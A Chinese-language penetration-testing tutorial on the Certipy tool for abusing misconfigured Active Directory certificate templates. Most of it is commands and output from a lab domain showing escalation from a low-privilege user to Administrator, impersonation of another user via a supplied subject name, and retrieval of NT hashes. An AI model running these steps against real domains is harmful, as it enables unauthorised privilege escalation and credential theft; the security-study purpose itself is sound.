渗透测试流程,如何使用Certipy检测活动目录证书安全

  • 作者:
  • 时间:2022-01-06 09:44:44
简介 渗透测试流程,如何使用Certipy检测活动目录证书安全

关于Certipy

Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/ly4k/Certipy.git

接下来,在命令行终端中切换至项目根目录,然后运行下列命令即可:

$ python3 setup.py install

别忘了将Python脚本目录添加至系统环境变量路径中。

工具使用

$ certipy -h

usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]

               target {find,req,auth,auto} ...

 

Active Directory certificate abuse

 

positional arguments:

  target                [[域名/]用户名[:密码]@]目标名称或地址>

  {find,req,auth,auto}  操作

    find                查找证书模板

    req                 请求一份新的证书

    auth                使用证书进行认证

    auto                自动利用证书实现提权

 

optional arguments:

  -h, --help              显示帮助信息

  -debug                开启调试模式输出

  -no-pass              不询问密码

  -k                    使用Kerberos认证。

  -dc-ip ip address        目标域控制器的IP地址

 

connection:

  -target-ip ip address

                        目标设备的IP地址

  -nameserver nameserver  用于DNS解析的域名服务器

  -dns-tcp               使用TCP代替UDP执行DNS查询

 

authentication:

  -hashes LMHASH:NTHASH

                        NTLM hashes, format is LMHASH:NTHASH

工具使用样例

自动化

在下面的使用样例中,用户john是一个低权限用户,可以注册Copy of Web Server模板:

$ certipy 'predator/john:Passw0rd@dc.predator.local' auto

[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'

[*] Generating RSA key

[*] Requesting certificate

[*] Request success

[*] Got certificate with UPN 'Administrator'

[*] Saved certificate to '1.crt'

[*] Saved private key to '1.key'

[*] Using UPN: 'Administrator@predator'

[*] Trying to get TGT...

[*] Saved credential cache to 'Administrator.ccache'

[*] Trying to retrieve NT hash for 'Administrator@predator'

[*] Got NT hash for 'Administrator@predator': fc525c9683e8fe067095ba2ddc971889

默认情况下,工具会选择Administrator用户,我们也可以使用-user参数来为其他用户创建证书。

查找

find操作将帮助我们查找一个或多个CA启用了的证书模板。

查找漏洞模板

使用-vulnerable参数将搜索存在漏洞的证书模板:

$ certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable

[*] Finding vulnerable certificate templates for 'john'

User

  Name                                  : predator\john

  Groups                                :

Certificate Authorities

  0

    CA Name                             : predator-DC-CA

    DNS Name                            : dc.predator.local

    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local

    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D

    Certificate Validity Start          : 2021-10-06 11:32:01+00:00

    Certificate Validity End            : 2026-10-06 11:42:01+00:00

    User Specified SAN                  : Disabled

    CA Permissions

      Owner                             : BUILTIN\Administrator

      Access Rights

        ManageCertificates              : BUILTIN\Administrator

                                          predator\Domain Admins

                                          predator\Enterprise Admins

        ManageCa                        : BUILTIN\Administrator

                                          predator\Domain Admins

                                          predator\Enterprise Admins

        Enroll                          : Authenticated Users

Vulnerable Certificate Templates

  0

    CAs                                 : predator-DC-CA

    Template Name                       : Copy of Web Server

    Validity Period                     : 2 years

    Renewal Period                      : 6 weeks

    Certificate Name Flag               : EnrolleeSuppliesSubject

    Enrollment Flag                     : None

    Authorized Signatures Required      : 0

    Extended Key Usage                  :

    Permissions

      Enrollment Permissions

        Enrollment Rights               : predator\Domain Admins

                                          predator\Enterprise Admins

                                          Authenticated Users

      Object Control Permissions

        Owner                           : predator\Administrator

        Write Owner Principals          : predator\Domain Admins

                                          predator\Enterprise Admins

                                          predator\Administrator

        Write Dacl Principals           : predator\Domain Admins

                                          predator\Enterprise Admins

                                          predator\Administrator

        Write Property Principals       : predator\Domain Admins

                                          predator\Enterprise Admins

                                          predator\Administrator

    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication

                                          'Authenticated Users' can enroll and template has dangerous EKU

使用-user参数将查找指定用户相关的存在漏洞的证书模板,默认配置下使用的是当前用户。

查找所有模板

$ certipy 'predator/john:Passw0rd@dc.predator.local' find

[*] Finding certificate templates for 'john'

User

  Name                                  : predator\john

  Groups                                :

Certificate Authorities

  0

    CA Name                             : predator-DC-CA

    DNS Name                            : dc.predator.local

    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local

    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D

    Certificate Validity Start          : 2021-10-06 11:32:01+00:00

    Certificate Validity End            : 2026-10-06 11:42:01+00:00

    User Specified SAN                  : Disabled

    CA Permissions

      Owner                             : BUILTIN\Administrator

      Access Rights

        ManageCertificates              : BUILTIN\Administrator

                                          predator\Domain Admins

                                          predator\Enterprise Admins

        ManageCa                        : BUILTIN\Administrator

                                          predator\Domain Admins

                                          predator\Enterprise Admins

        Enroll                          : Authenticated Users

Certificate Templates

  0

    CAs                                 : predator-DC-CA

    Template Name                       : User

    Validity Period                     : 1 year

    Renewal Period                      : 6 weeks

    Certificate Name Flag               : SubjectRequireDirectoryPath

                                          SubjectRequireEmail

                                          SubjectAltRequireEmail

                                          SubjectAltRequireUpn

    Enrollment Flag                     : AutoEnrollment

                                          PublishToDs

                                          IncludeSymmetricAlgorithms

    Authorized Signatures Required      : 0

    Extended Key Usage                  : Encrypting File System

                                          Secure Email

                                          Client Authentication

    Permissions

      Enrollment Permissions

        Enrollment Rights               : predator\Domain Admins

                                          predator\Domain Users

                                          predator\Enterprise Admins

      Object Control Permissions

        Owner                           : predator\Enterprise Admins

        Write Owner Principals          : predator\Domain Admins

                                          predator\Enterprise Admins

        Write Dacl Principals           : predator\Domain Admins

                                          predator\Enterprise Admins

        Write Property Principals       : predator\Domain Admins

                                          predator\Enterprise Admins

[...]

  11

    CAs                                 : predator-DC-CA

    Template Name                       : Copy of Web Server

    Validity Period                     : 2 years

    Renewal Period                      : 6 weeks

    Certificate Name Flag               : EnrolleeSuppliesSubject

    Enrollment Flag                     : None

    Authorized Signatures Required      : 0

    Extended Key Usage                  :

    Permissions

      Enrollment Permissions

        Enrollment Rights               : predator\Domain Admins

                                          predator\Enterprise Admins

                                          Authenticated Users

      Object Control Permissions

        Owner                           : predator\Administrator

        Write Owner Principals          : predator\Domain Admins

                                          predator\Enterprise Admins

                                          predator\Administrator

        Write Dacl Principals           : predator\Domain Admins

                                          predator\Enterprise Admins

                                          predator\Administrator

        Write Property Principals       : predator\Domain Admins

                                          predator\Enterprise Admins

                                          predator\Administrator

查询请求

用户josh将会以用户jane的身份请求一个有效的身份认证证书,predator-DC-CA已启用了Copy of Web Server:

$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'

[*] Generating RSA key

[*] Requesting certificate

[*] Request success

[*] Got certificate with UPN 'jane'

[*] Saved certificate to '2.crt'

[*] Saved private key to '2.key'

以当前用户身份请求证书

$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'User' -ca 'predator-DC-CA'

[*] Generating RSA key

[*] Requesting certificate

[*] Request success

[*] Got certificate with UPN 'john@predator.local'

[*] Saved certificate to '3.crt'

[*] Saved private key to '3.key'

身份认证

auth操作将会使用PKINIT Kerberos扩展来对提供的证书进行身份认证:

$ certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key

[*] Using UPN: 'jane@predator'

[*] Trying to get TGT...

[*] Saved credential cache to 'jane.ccache'

[*] Trying to retrieve NT hash for 'jane@predator'

[*] Got NT hash for 'jane@predator': 077cccc23f8ab7031726a3b70c694a49

项目地址

Certipy:GitHub传送门

参考资料

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://github.com/dirkjanm/PKINITtools

关闭